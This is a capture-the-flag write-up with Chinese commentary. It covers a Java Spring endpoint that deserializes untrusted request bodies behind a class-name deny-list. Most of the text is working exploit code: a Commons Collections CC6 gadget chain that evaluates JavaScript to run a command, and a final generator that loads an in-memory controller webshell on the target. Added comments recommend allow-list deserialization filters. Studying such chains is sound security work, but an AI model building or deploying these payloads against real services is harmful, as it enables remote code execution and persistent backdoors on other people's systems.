2026 ccb final wp

controller直接有反序列化

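/**
     * Deserializes the raw request body through {@code SafeObjectInputStream}.
     *
     * <p>{@code data} is untrusted client input. {@code SafeObjectInputStream} is a project
     * class whose checks are not visible here; the page shows only a class-name deny-list for
     * it. A deny-list blocks exactly the classes it names and nothing else, so the robust
     * control is an allow-list {@link java.io.ObjectInputFilter} (installed with
     * {@code ois.setObjectInputFilter(...)}) that admits only the types this endpoint is meant
     * to receive — TODO confirm which types those are before adding one.
     *
     * @param data the serialized object graph posted by the client
     * @return a fixed success message once {@code readObject()} returns
     * @throws RuntimeException wrapping any I/O or class-resolution failure
     */
    @PostMapping({"/"})
    public String deserialize(@RequestBody byte[] data) {
        // try-with-resources closes the stream on every path; the original only closed it
        // after a successful readObject().
        try (ObjectInputStream ois = new SafeObjectInputStream(new ByteArrayInputStream(data))) {
            // The deserialized object is never used; the side effects of readObject() are
            // what matters for security review.
            ois.readObject();
            return "deserialization success";
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }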

黑名单

    /**
     * Fully qualified class names rejected during deserialization (a deny-list).
     *
     * <p>A deny-list only stops the classes it names; as the surrounding write-up observes,
     * {@code javax.script.ScriptEngineManager} is not among them. An allow-list of the types the
     * endpoint actually expects (e.g. via {@code java.io.ObjectInputFilter}) is the more robust
     * control.
     */
    private static final String[] blacklist = {
            "java.lang.Runtime",
            "java.lang.ProcessBuilder",
            "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
            "java.security.SignedObject",
            "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet",
            "javax.management.remote.rmi.RMIConnector"
    };

有cc依赖可以打cc1或者cc6,而且没有banScriptEngineManager,直接js eval,本地弹计算器poc

package com.cc6test;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.script.ScriptEngineManager;
import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.net.URLEncoder;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

/**
 * Local proof-of-concept from the write-up: builds a Commons Collections (CC6-style)
 * serialized payload and prints it Base64-encoded.
 *
 * <p>Defensive takeaway: every class in the chain below (Commons Collections transformers,
 * {@code LazyMap}, {@code TiedMapEntry}, {@code ScriptEngineManager}) is absent from the
 * deny-list shown on this page, which is why the filter does not stop it. An allow-list
 * {@code ObjectInputFilter} on the receiving side, or removing the vulnerable
 * commons-collections dependency, addresses the whole class of payloads rather than one
 * gadget at a time.
 */
public class Test02 {
    /**
     * Builds the payload and prints it as Base64.
     *
     * @param args unused
     * @throws Exception on reflection or serialization failure
     */
    public static void main(String[] args) throws Exception {
        // Transformer chain, run left to right by ChainedTransformer:
        Transformer[] transformers = new Transformer[]{
                // Step 1: yields the Class object for ScriptEngineManager.
                new ConstantTransformer(ScriptEngineManager.class),

                // Step 2: Class<T>.newInstance() with no arguments.
                new InvokerTransformer("newInstance", new Class[]{}, new Object[]{}),

                // Step 3: ScriptEngineManager.getEngineByName("js").
                new InvokerTransformer("getEngineByName",
                        new Class[]{String.class},
                        new Object[]{"js"}),

                // Step 4: ScriptEngine.eval(...) with the JS snippet below.
                new InvokerTransformer("eval",
                        new Class[]{String.class},
                        new Object[]{"java.lang.Runtime.getRuntime().exec('calc')"})
        };

        ChainedTransformer chainedTransformer =  new ChainedTransformer(transformers);
        HashMap<Object,Object> map = new HashMap<>();
        // Placeholder factory; the real chain is swapped in by reflection further down.
        Map<Object,Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
        TiedMapEntry t = new TiedMapEntry(lazymap, "key");
        HashMap<Object, Object> finalmap = new HashMap<>();
        finalmap.put(t, "value");
        // Presumably undoes the entry that put() created through the placeholder factory,
        // so the map is empty when it is serialized — confirm against LazyMap.get().
        lazymap.remove("key");
        // Replace the private 'factory' field with the real chain via reflection.
        Class c = LazyMap.class;
        Field f = c.getDeclaredField("factory");
        f.setAccessible(true);
        f.set(lazymap,chainedTransformer);
        byte[] bytes = serialize(finalmap);
        String evilCode = Base64.getEncoder().encodeToString(bytes);
        System.out.println(evilCode);
//        unserialize("ser.bin");
    }
    /**
     * Serializes {@code obj} to a byte array with plain {@link ObjectOutputStream}.
     *
     * @param obj the object graph to serialize
     * @return the serialized bytes
     * @throws Exception on serialization failure
     */
    public static byte[] serialize(Object obj) throws Exception {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(out);
        objectOutputStream.writeObject(obj);
        return out.toByteArray();
    }
    /**
     * Deserializes the first object from the named file with an unfiltered
     * {@link ObjectInputStream} (unused by {@link #main}; the stream is never closed).
     *
     * @param Filename path of the file to read
     * @return the deserialized object
     * @throws Exception on I/O or class-resolution failure
     */
    public static Object unserialize(String Filename) throws Exception {
        ObjectInputStream in = new ObjectInputStream(new FileInputStream(Filename));
        Object o = in.readObject();
        return o;
    }
}

远程环境不出网,打controller内存马,最终exp

package com.ezjava;  
  
import javassist.ClassPool;  
import javassist.CtClass;  
import org.apache.commons.collections.Transformer;  
import org.apache.commons.collections.functors.ChainedTransformer;  
import org.apache.commons.collections.functors.ConstantTransformer;  
import org.apache.commons.collections.functors.InvokerTransformer;  
import org.apache.commons.collections.keyvalue.TiedMapEntry;  
import org.apache.commons.collections.map.LazyMap;  
  
import javax.script.ScriptEngineManager;  
import java.io.ByteArrayOutputStream;  
import java.io.FileInputStream;  
import java.io.ObjectInputStream;  
import java.io.ObjectOutputStream;  
import java.lang.reflect.Field;  
import java.util.Base64;  
import java.util.HashMap;  
import java.util.Map;  
  
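/**
 * Final payload generator from the write-up: the same Commons Collections (CC6-style)
 * chain as the local PoC, with the {@code eval} step replaced by one that defines the
 * {@code com.ezjava.controller.InjectToController} class (its bytecode is not shown on this
 * page) on the target's context class loader and instantiates it.
 *
 * <p>Defensive takeaway: none of the classes this chain relies on appear in the deny-list
 * shown on this page, and the in-memory class definition leaves no file on disk. An
 * allow-list {@code ObjectInputFilter} at the deserialization boundary, or removing the
 * vulnerable commons-collections dependency, blocks this regardless of the final step.
 *
 * <p>Fix relative to the page's listing: the comment for the {@code getEngineByName} step
 * had swallowed the following {@code new InvokerTransformer(...)} line (an extraction
 * artifact), leaving the class uncompilable; the line break is restored. Streams in the
 * helpers are now closed via try-with-resources.
 */
public class exp {
    /**
     * Builds the payload and prints it as Base64.
     *
     * @param args unused
     * @throws Exception on reflection, bytecode-loading or serialization failure
     */
    public static void main(String[] args) throws Exception {
        byte[] bytesa = GenerateMemShell();
        String a = Base64.getEncoder().encodeToString(bytesa);

        // Transformer chain, run left to right by ChainedTransformer:
        Transformer[] transformers = new Transformer[]{
                // Step 1: yields the Class object for ScriptEngineManager.
                new ConstantTransformer(ScriptEngineManager.class),

                // Step 2: Class<T>.newInstance() with no arguments.
                new InvokerTransformer("newInstance", new Class[]{}, new Object[]{}),

                // Step 3: ScriptEngineManager.getEngineByName("js").
                new InvokerTransformer("getEngineByName",
                        new Class[]{String.class},
                        new Object[]{"js"}),

                // Step 4: ScriptEngine.eval(...) with the JS snippet below, which embeds the
                // Base64 bytecode produced by GenerateMemShell().
                new InvokerTransformer("eval",
                        new Class[]{String.class},
                        new Object[]{"org.springframework.cglib.core.ReflectUtils.defineClass(\"com.ezjava.controller.InjectToController\",org.springframework.util.Base64Utils.decodeFromString(\""+a+"\"),java.lang.Thread.currentThread().getContextClassLoader()).newInstance()"})
        };

        ChainedTransformer chainedTransformer =  new ChainedTransformer(transformers);
        HashMap<Object,Object> map = new HashMap<>();
        // Placeholder factory; the real chain is swapped in by reflection further down.
        Map<Object,Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
        TiedMapEntry t = new TiedMapEntry(lazymap, "key");
        HashMap<Object, Object> finalmap = new HashMap<>();
        finalmap.put(t, "value");
        // Presumably undoes the entry that put() created through the placeholder factory,
        // so the map is empty when it is serialized — confirm against LazyMap.get().
        lazymap.remove("key");
        // Replace the private 'factory' field with the real chain via reflection.
        Class<?> c = LazyMap.class;
        Field f = c.getDeclaredField("factory");
        f.setAccessible(true);
        f.set(lazymap,chainedTransformer);
        byte[] bytes = serialize(finalmap);
        String evilCode = Base64.getEncoder().encodeToString(bytes);
        System.out.println(evilCode);
    }

    /**
     * Reads the compiled {@code com.ezjava.controller.InjectToController} class from the
     * default javassist {@link ClassPool} (i.e. the local classpath) and returns its bytecode.
     * The class itself is not part of this listing.
     *
     * @return the class file bytes
     * @throws Exception if the class cannot be found or converted
     */
    private static byte[] GenerateMemShell() throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass ctClass = pool.getCtClass("com.ezjava.controller.InjectToController");
        return ctClass.toBytecode();
    }

    /**
     * Serializes {@code obj} to a byte array with plain {@link ObjectOutputStream}.
     *
     * @param obj the object graph to serialize
     * @return the serialized bytes
     * @throws Exception on serialization failure
     */
    public static byte[] serialize(Object obj) throws Exception {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        try (ObjectOutputStream objectOutputStream = new ObjectOutputStream(out)) {
            objectOutputStream.writeObject(obj);
        }
        return out.toByteArray();
    }

    /**
     * Deserializes the first object from the named file with an unfiltered
     * {@link ObjectInputStream}. Unused by {@link #main}; kept for parity with the page.
     *
     * @param Filename path of the file to read
     * @return the deserialized object
     * @throws Exception on I/O or class-resolution failure
     */
    public static Object unserialize(String Filename) throws Exception {
        try (ObjectInputStream in = new ObjectInputStream(new FileInputStream(Filename))) {
            return in.readObject();
        }
    }
}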